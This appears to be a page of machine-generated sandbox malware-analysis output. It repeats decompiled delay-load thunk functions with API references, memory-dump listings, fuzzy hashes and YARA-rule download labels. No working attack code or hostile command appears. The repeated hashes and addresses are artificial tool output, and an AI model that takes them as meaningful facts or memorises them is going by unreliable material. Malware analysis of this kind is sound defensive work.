                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                    			E0122D766() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0122DDAF(_t3, _t4, _t8, _t9, _t10, 0x124ada4, 0x1271138); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122d6f1
                                                                                                                                                    0x0122d6f9
                                                                                                                                                    0x0122d700

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122D6F9
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: 88446695094d962626a7e7dcc41e16b5e22457ac8b6fc7af0c7c1244d670e424
                                                                                                                                                    • Instruction ID: 637e0815a437889c9f2579af235d87dcd7d36ec2c3fcc3089012a7b1d24142e3
                                                                                                                                                    • Opcode Fuzzy Hash: 88446695094d962626a7e7dcc41e16b5e22457ac8b6fc7af0c7c1244d670e424
                                                                                                                                                    • Instruction Fuzzy Hash: 11B012F32B9526BE31C862957C03D3F010CC8D0911330820EF007C5440D8880C500032
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122D77A, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                    			E0122D77A() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0122DDAF(_t3, _t4, _t8, _t9, _t10, 0x124ada4, 0x1271130); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122d6f1
                                                                                                                                                    0x0122d6f9
                                                                                                                                                    0x0122d700

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122D6F9
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: 5aaabb7be33c10e3fcf752af639b4e0e05f7293bde119a790a4668f60ddfe304
                                                                                                                                                    • Instruction ID: a4bca41f41e7c68866f9b75a2feeb91b7fcf52d26e79dbee15bf4521c3a98055
                                                                                                                                                    • Opcode Fuzzy Hash: 5aaabb7be33c10e3fcf752af639b4e0e05f7293bde119a790a4668f60ddfe304
                                                                                                                                                    • Instruction Fuzzy Hash: EEB012E32B9426BE308861957C02D3F024CDCD0951330800EF007C5040D8880C100032
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122D748, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                    			E0122D748() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0122DDAF(_t3, _t4, _t8, _t9, _t10, 0x124ada4, 0x1271144); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122d6f1
                                                                                                                                                    0x0122d6f9
                                                                                                                                                    0x0122d700

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122D6F9
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: 00bc7ef97977a82ab3dd2a3ae49ff78e4acb3ec0ad3ce474df9a5da326a91dcd
                                                                                                                                                    • Instruction ID: 246ecbd073ad0c345b59894b2f18be39a4f3f2d3727699568714784829924361
                                                                                                                                                    • Opcode Fuzzy Hash: 00bc7ef97977a82ab3dd2a3ae49ff78e4acb3ec0ad3ce474df9a5da326a91dcd
                                                                                                                                                    • Instruction Fuzzy Hash: 13B012F32B8426BE308861957D03E3F010CC8D0D11330801EF407C5440D8880D110032
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122D752, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                    			E0122D752() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0122DDAF(_t3, _t4, _t8, _t9, _t10, 0x124ada4, 0x1271140); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122d6f1
                                                                                                                                                    0x0122d6f9
                                                                                                                                                    0x0122d700

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122D6F9
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: a73cf93039c3a1cc27f5a4bb096db34d791a1bc38a3c9e65bfe06156c5979a6b
                                                                                                                                                    • Instruction ID: 669f94468735ee0293f933d52b452c661cc1f1ea79e0fed5a7dc17ff219ab496
                                                                                                                                                    • Opcode Fuzzy Hash: a73cf93039c3a1cc27f5a4bb096db34d791a1bc38a3c9e65bfe06156c5979a6b
                                                                                                                                                    • Instruction Fuzzy Hash: 00B012F32B8426BE308861967C03E3F020CD8D0D51330800EF407C5040D8880C100032
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122D75C, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                    			E0122D75C() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0122DDAF(_t3, _t4, _t8, _t9, _t10, 0x124ada4, 0x127113c); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122d6f1
                                                                                                                                                    0x0122d6f9
                                                                                                                                                    0x0122d700

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122D6F9
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: f5152e6207b6efe5bd19638cfe099842a244afbb5a7e08f29534db02787f1d2d
                                                                                                                                                    • Instruction ID: 95c3811bcf10c567ddc47a66a8d58ef802139750367b12021213e211c95fd412
                                                                                                                                                    • Opcode Fuzzy Hash: f5152e6207b6efe5bd19638cfe099842a244afbb5a7e08f29534db02787f1d2d
                                                                                                                                                    • Instruction Fuzzy Hash: 74B012E72B9426BE308861957C02E3F010CC8D0911330C00FF407C5040D8880C100032
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122D784, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                    			E0122D784() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0122DDAF(_t3, _t4, _t8, _t9, _t10, 0x124ada4, 0x127112c); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122d6f1
                                                                                                                                                    0x0122d6f9
                                                                                                                                                    0x0122d700

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122D6F9
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: ee9fba034d4e470e638341ae25672ad861c024f7031cacbd931bf568e21ccaa6
                                                                                                                                                    • Instruction ID: a22109326874f889fc2f6b43bfe3c6edf3a6ff1b85d37e958cea0ed2e51791ee
                                                                                                                                                    • Opcode Fuzzy Hash: ee9fba034d4e470e638341ae25672ad861c024f7031cacbd931bf568e21ccaa6
                                                                                                                                                    • Instruction Fuzzy Hash: AEB012E73B8426BE308C61A57C02E3F014CC8D0911330C00EF407C5040D8880C100032
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122D798, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                    			E0122D798() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0122DDAF(_t3, _t4, _t8, _t9, _t10, 0x124ada4, 0x1271124); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122d6f1
                                                                                                                                                    0x0122d6f9
                                                                                                                                                    0x0122d700

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122D6F9
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: bee03a4019342abec3427d0bce7a19112797d0f487dfa6c9f8c2bec3d918f5d8
                                                                                                                                                    • Instruction ID: e315aad501e6d18de44b540be00d0027508dedd4ae6a8cd5ddeb0d5a2cee35d2
                                                                                                                                                    • Opcode Fuzzy Hash: bee03a4019342abec3427d0bce7a19112797d0f487dfa6c9f8c2bec3d918f5d8
                                                                                                                                                    • Instruction Fuzzy Hash: B7B012F33B8426BE308C61957D02D3F018CC8D0911330801EF007C5440D8880C110032
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122D7CA, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                    			E0122D7CA() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0122DDAF(_t3, _t4, _t8, _t9, _t10, 0x124ada4, 0x1271110); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122d6f1
                                                                                                                                                    0x0122d6f9
                                                                                                                                                    0x0122d700

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122D6F9
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: 7341bd198fa0734ada7a56ce3da2271fc63e9bd6b1a28bfab3bc9fdea2d34674
                                                                                                                                                    • Instruction ID: 715cc5a4e4bb6ad3df665e8fc0f67053b640e9586bd82e9c28eb3b8de2cf00ca
                                                                                                                                                    • Opcode Fuzzy Hash: 7341bd198fa0734ada7a56ce3da2271fc63e9bd6b1a28bfab3bc9fdea2d34674
                                                                                                                                                    • Instruction Fuzzy Hash: 97B012E32B8426BE319861957C03D3F020CD8D0951330840EF007C5080D8880C100032
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122D6E7, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                    			E0122D6E7() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0122DDAF(_t3, _t4, _t8, _t9, _t10, 0x124ada4, 0x1271168); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122d6f1
                                                                                                                                                    0x0122d6f9
                                                                                                                                                    0x0122d700

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122D6F9
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: 0844cbc90fde3595d984aed352eb568b8ddc7578a1372f54472beaa71f629071
                                                                                                                                                    • Instruction ID: 8a69055d3a989a0e52684911a76e8fcc6ab1d32848512c9530db27aa90ffb919
                                                                                                                                                    • Opcode Fuzzy Hash: 0844cbc90fde3595d984aed352eb568b8ddc7578a1372f54472beaa71f629071
                                                                                                                                                    • Instruction Fuzzy Hash: 5AB012E72B8727FE358821917C43C3F010CC8D0951330810EF003C4440DCC80C500032
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122D920, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 22%
                                                                                                                                                    			E0122D920() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x124adc4); // executed
				E0122DDAF(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122d903
                                                                                                                                                    0x0122d908
                                                                                                                                                    0x0122d90f

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122D908
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: 67a327b6cca4af2e49c4d76ae9597e50b83f3dfc328c0de627b168967d9219cd
                                                                                                                                                    • Instruction ID: 607735f11a48e93f5242021637c367a3fc0488430138db5fbca59d0a08e1aa60
                                                                                                                                                    • Opcode Fuzzy Hash: 67a327b6cca4af2e49c4d76ae9597e50b83f3dfc328c0de627b168967d9219cd
                                                                                                                                                    • Instruction Fuzzy Hash: 90A001E76B992BBE324872A2AD0AD3E021DC4E4A623B4995EF446850C4A88818450031
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122D93E, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 22%
                                                                                                                                                    			E0122D93E() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x124adc4); // executed
				E0122DDAF(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122d903
                                                                                                                                                    0x0122d908
                                                                                                                                                    0x0122d90f

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122D908
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: e29c588e59a929b4e81582f28720decd16cdbc9df337aa030c61d06050ed2d03
                                                                                                                                                    • Instruction ID: 607735f11a48e93f5242021637c367a3fc0488430138db5fbca59d0a08e1aa60
                                                                                                                                                    • Opcode Fuzzy Hash: e29c588e59a929b4e81582f28720decd16cdbc9df337aa030c61d06050ed2d03
                                                                                                                                                    • Instruction Fuzzy Hash: 90A001E76B992BBE324872A2AD0AD3E021DC4E4A623B4995EF446850C4A88818450031
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122D916, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 22%
                                                                                                                                                    			E0122D916() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x124adc4); // executed
				E0122DDAF(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122d903
                                                                                                                                                    0x0122d908
                                                                                                                                                    0x0122d90f

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122D908
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: 0ddd49b9f58d68b159ab833ce7450514002a94277b6889a684e786298b8bcc65
                                                                                                                                                    • Instruction ID: 607735f11a48e93f5242021637c367a3fc0488430138db5fbca59d0a08e1aa60
                                                                                                                                                    • Opcode Fuzzy Hash: 0ddd49b9f58d68b159ab833ce7450514002a94277b6889a684e786298b8bcc65
                                                                                                                                                    • Instruction Fuzzy Hash: 90A001E76B992BBE324872A2AD0AD3E021DC4E4A623B4995EF446850C4A88818450031
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122D948, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                    Download Yara Rule
